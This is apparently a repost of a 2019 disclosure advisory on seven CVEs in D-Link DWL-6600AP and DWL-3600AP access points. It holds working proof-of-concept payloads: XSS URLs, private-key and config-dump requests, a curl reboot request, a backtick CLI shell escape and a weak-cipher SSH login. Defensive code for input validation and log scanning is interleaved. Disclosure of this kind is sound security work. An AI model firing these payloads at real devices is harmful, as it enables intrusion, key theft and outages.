1337DAY-ID-33070 - Sandstorm Security - Aug 01, 2019

D-Link 6600-AP XSS / DoS / Information Disclosure Vulnerabilities


Exploit for hardware platform in category web applications

# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP

Multiple vulnerabilities were found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). The D-Link 6600-AP is no longer produced, but D-Link still provides support for it, as described on the D-Link website. Note that this product is built for business customers of D-Link, so we can expect thousands of devices to be at risk. The code base is shared with the DWL-3600AP and DWL-8610AP.

### This advisory was sent to D-Link on 22/05/2019
Many thanks to the D-Link Security Team for their prompt reaction!

### Affected Product
D-Link 6600-AP and DWL-3600AP; vulnerability number 2 also affects the DWL-8610AP

### Firmware version
4.2.0.14, Revision Ax, date: 21/03/2019

### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier
WLAN-EAP

### Hardware Version
A2

### Manufacturer
D-LINK

## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point
for business environments. With high data transmission speeds, load
balancing features, it can be deployed as a standalone wireless Access
Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

 1. CVE-2019-14338 - Post-authenticated XSS
 2. CVE-2019-14334 - Post-authenticated certificate and RSA private key extraction through HTTP command
 3. CVE-2019-14333 - Pre-authenticated denial of service leading to the reboot of the AP
 4. CVE-2019-14337 - Shell escape in the restricted command line interface
 5. CVE-2019-14335 - Post-authenticated denial of service leading to the reboot of the AP
 6. CVE-2019-14336 - Post-authenticated dump of all the config files
 7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14338
#### Proof of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Post-authenticated certificate and RSA private key extraction through HTTP command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14334
#### Proof of concept

http://10.90.90.91/sslcert-get.cgi?

Result of the command: the file "mini_httpd.pem" (the server certificate and its RSA private key) is extracted automatically.

### 3. Pre-authenticated denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof of concept

kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

### 4. Shell escape in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14337
#### Proof of concept

DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
        [--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
        [--no-check-certificate] [-U|--user-agent AGENT][-T SEC]  URL

Retrieve files via HTTP or FTP

Options:
        -s      Spider mode - only check file existence
        -c      Continue retrieval of aborted transfer
        -q      Quiet
        -P DIR  Save to DIR (default .)
        -T SEC  Network read timeout is SEC seconds
        -O FILE Save to FILE ('-' for stdout)
        -U STR  Use STR for User-Agent header
        -Y      Use proxy ('on' or 'off')

DLINK-WLAN-AP#
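One way a restricted CLI avoids the backtick escape shown above, added here as an illustration and not the D-Link CLI's own code: every line is screened for shell metacharacters before parsing, the command word must be in an allowlist, arguments are restricted to a safe character set, and the resulting argv is executed without any shell. The command table, argument character set and binary paths are assumptions.

```python
import re
import subprocess

# Hypothetical allowlist for a restricted CLI: user-visible command -> fixed argv prefix.
# This table is an assumption for illustration, not the D-Link CLI's own table.
ALLOWED = {
    "ping": ["/bin/ping", "-c", "3"],
    "show-version": ["/bin/cat", "/etc/version"],
}
# Characters that only matter to a shell; none of them belong in a CLI line.
META = set("`$;&|<>(){}\n\\\"'")
# Assumed safe argument shape: hostnames, IPs, simple tokens.
ARG_RE = re.compile(r"^[A-Za-z0-9._:-]+$")


class RejectedCommand(Exception):
    pass


def build_argv(line):
    """Turn one CLI line into an argv list, or raise RejectedCommand."""
    if any(ch in META for ch in line):
        raise RejectedCommand("shell metacharacters are not allowed")
    words = line.split()
    if not words or words[0] not in ALLOWED:
        raise RejectedCommand("Invalid command.")
    args = words[1:]
    for arg in args:
        if not ARG_RE.match(arg):
            raise RejectedCommand("argument contains disallowed characters: %r" % arg)
    return ALLOWED[words[0]] + args


def rejects(line):
    """True if build_argv refuses the line (handy for exercising the guard)."""
    try:
        build_argv(line)
    except RejectedCommand:
        return True
    return False


def run(line):
    """Execute a validated CLI line directly (no shell) and return its stdout."""
    argv = build_argv(line)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout
```

Because the argv list never passes through `/bin/sh -c`, a line such as `` `/bin/sh -c wget` `` is rejected at the metacharacter check rather than being evaluated.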

### 5. Post-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14335
#### Proof of concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated Dump all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14336
#### Proof of concept

http://10.90.90.91/admin.cgi?action=
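A defender-side check for the HTTP issues above (items 1, 2, 3, 5 and 6), added here as an example and not part of the advisory: it scans combined-format access-log lines for requests to admin.cgi whose action value is empty, overlong, carries a printf-style specifier, or contains script markup, and for any hit on sslcert-get.cgi. The log lines are constructed, and the length threshold and the format-specifier class are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access-log lines; sample data, not captured from a
# real device. The 300-byte action mirrors the shape of the PoC for item 3.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [22/May/2019:10:00:01 +0000] "GET /admin.cgi?action=status HTTP/1.1" 200 512',
    '192.0.2.10 - - [22/May/2019:10:00:02 +0000] "GET /admin.cgi?action=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 800',
    '192.0.2.11 - - [22/May/2019:10:00:03 +0000] "POST /admin.cgi?action=' + "A" * 300 + ' HTTP/1.1" 200 0',
    '192.0.2.12 - - [22/May/2019:10:00:04 +0000] "GET /admin.cgi?action=%s HTTP/1.1" 200 0',
    '192.0.2.12 - - [22/May/2019:10:00:05 +0000] "GET /admin.cgi?action= HTTP/1.1" 200 40960',
    '192.0.2.13 - - [22/May/2019:10:00:06 +0000] "GET /sslcert-get.cgi? HTTP/1.1" 200 3072',
    '192.0.2.14 - - [22/May/2019:10:00:07 +0000] "GET /index.html HTTP/1.1" 200 1024',
])

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
SCRIPT_RE = re.compile(r'<\s*/?\s*script|javascript:|\bon\w+\s*=', re.I)
FORMAT_RE = re.compile(r'%[0-9]*[sdxXnp]')   # printf-style conversions (assumed trigger class for item 5)
MAX_ACTION_LEN = 128                          # assumed: legitimate actions are short keywords


def classify(line):
    """Return (client_ip, finding) for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path == "/sslcert-get.cgi":
        return (m.group("ip"), "CVE-2019-14334: TLS certificate / RSA private key download")
    if url.path != "/admin.cgi":
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "action" not in params:
        return None
    action = params["action"][0]          # parse_qs already percent-decodes the value
    if action == "":
        return (m.group("ip"), "CVE-2019-14336: empty action dumps configuration files")
    if FORMAT_RE.search(action):
        return (m.group("ip"), "CVE-2019-14335: format specifier in action (AP reboot)")
    if len(action) > MAX_ACTION_LEN:
        return (m.group("ip"), "CVE-2019-14333: overlong action (pre-auth AP reboot)")
    if SCRIPT_RE.search(action):
        return (m.group("ip"), "CVE-2019-14338: script markup reflected via action (XSS)")
    return None


def scan(log_text):
    """Run classify() over every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

Running `scan(SAMPLE_LOG)` yields one hit per attack line and nothing for the two benign requests; on a real device, feed it the web server's access log and alert on any hit from outside the management network.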

### 7. Use of weak ciphers for SSH
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14332
#### Proof of concept

[email protected]:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
[email protected]'s password:
Enter 'help' for help.

DLINK-WLAN-AP# help

## Report Timeline
22/05/2019 : This advisory is sent to D-Link; the contents of this report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to the mailing list.

## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip


## About me - [email protected]
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources

#  0day.today [2019-12-04]  #